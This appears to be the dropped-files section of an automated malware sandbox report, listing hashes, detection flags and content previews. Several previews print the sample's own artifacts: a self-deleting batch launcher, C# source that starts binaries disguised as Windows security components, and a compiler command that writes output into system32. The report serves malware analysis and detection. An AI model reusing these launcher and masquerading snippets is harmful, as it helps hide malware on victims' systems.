                                                            Preview:L......g.............debug$S........P...................@..B.rsrc$01................|...........@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP......................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESFE67.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Browserhost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...

                                                            C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):163
                                                            Entropy (8bit):5.2167103006036974
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mHBZ7+yBktKcKZG1Ukh4E2J5xAIbycUBq:hCRLuVFOOr+DEHBZqyKOZG1923fbycqq
                                                            MD5:279CB8734D9878FBBE1B876558088B94
                                                            SHA1:E6E4E232B76398DAD53E08C6611DBB67A058CB93
                                                            SHA-256:BC5D8AAB7DF431D25319E80C57A486918FC177CB1180244E8D060B4E1510613E
                                                            SHA-512:D76F5E69CE6804615E9EC363AD6492A287A0E08C692F3DF50348397664549D6F0487C8E176F0C5F5956A2474195B71EC45CC4C943712D1835783C0EDAD457C62
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Browserhost\LaSqLWtOcizKrlm.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZtWwdj1Vck.bat"

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_134tzpsn.jag.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hxi4ufe.lc3.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x25td23.pzi.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qb5sprb.aw3.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5l2uuwb.1ua.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fw2fdwyg.hf0.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkothrzi.lxx.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoyz4bn4.hhf.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq0y0mpo.ubz.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irnd554e.rzn.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivrjfiw1.ak2.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ko2morla.rxu.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4dizwuv.pbu.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obharrce.qgs.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pe1blgh1.nvo.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qb1laq4f.jug.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qsmog1jf.mzm.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkds4lsh.sm5.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vldpdqwu.pyd.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvz1r3ky.2ze.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgwna4k4.skd.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhrtvfgo.oxe.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjxuhmbh.o30.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxnswspz.ske.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\ahDE2nFSQU

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.323856189774723
                                                            Encrypted:false
                                                            SSDEEP:3:6EudY19fnZn:6FYbZ
                                                            MD5:FA3E9203B33E78973E1CC9D3E37D2A95
                                                            SHA1:E92AFFB2AD102D850656BECCC37F84A90168C979
                                                            SHA-256:ABA828AC314E582FE587943CD4538446B0AB6EC50D93A0A818C155C3457E162D
                                                            SHA-512:BF18E2AD16B91FF4D8BDAA1AA18C2B5753C169E8413FA42C344191057054610C3C17D378E155D3C73DE944ECEDF78925515822C2BB4DDBBCC79F1A89B6AF7133
                                                            Malicious:false
                                                            Preview:tlGaDLCnX6c6UEbPSADUZaB1e

                                                            C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.0.cs

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                            Category:dropped
                                                            Size (bytes):367
                                                            Entropy (8bit):4.890181987450651
                                                            Encrypted:false
                                                            SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JaHiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKK
                                                            MD5:69F53655E62666D39407C93C670FC115
                                                            SHA1:581DC75F5842B29E3ED0FFC67AA99172EC9E8DC0
                                                            SHA-256:33BD981472AA1A9C574222B8B9C454FC2ADC7F18F84925526CE303B6191F2CE8
                                                            SHA-512:BE12A6CF991A8D15935F5B6B70E066AB0CED37C755ED58E1801731BC406D32CDC9F4AEFAADE493258B69D7CD0A7F233A44F5670DCC4F00ED9A11A5D4C236F289
                                                            Malicious:false
                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\upfc.exe"); } catch { } }).Start();. }.}.

                                                            C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):251
                                                            Entropy (8bit):5.018223098522289
                                                            Encrypted:false
                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fAnIpdx:Hu7L//TRq79cQyonIpP
                                                            MD5:CFA27F5CB575B03F4E7E7036E4EFFD33
                                                            SHA1:0413F11113CCA6888BD4EB99BDA2A5E7722BA98D
                                                            SHA-256:5204373591D4D3661D4890AB0FEFE45DD340E85174E22840EBD1440A03104510
                                                            SHA-512:AAEF495067A7A16E2EA1D261984621CC4DF618E86627568AF638CEBD6600698C2760589E17BB9A34469A489D98C230F9814ED219F6A7102D30D7F10961F85481
                                                            Malicious:false
                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.0.cs"

                                                            C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.out

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (322), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):743
                                                            Entropy (8bit):5.236364988688541
                                                            Encrypted:false
                                                            SSDEEP:12:1I/u7L//TRq79cQyonIp2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:1I/un/Vq79tyZQKax5DqBVKVrdFAMBJj
                                                            MD5:4C58110907DF2B05F19DA64345863712
                                                            SHA1:CEC00E25D2A16EC577796A3F9CF962475E2D49A6
                                                            SHA-256:5A7FCC3594F3043E3EE02D625ACAE7BC8690E9DE26EB9000991919642D9BACC7
                                                            SHA-512:76CC7FD98E576EEA1DA3974CE868ED558935BEE5C7CAE2E3E22480ED566C329D90088AC0BD71C4CF5CA8A905295D9B879BAE487501304302F79F4545C1C203A9
                                                            Malicious:false
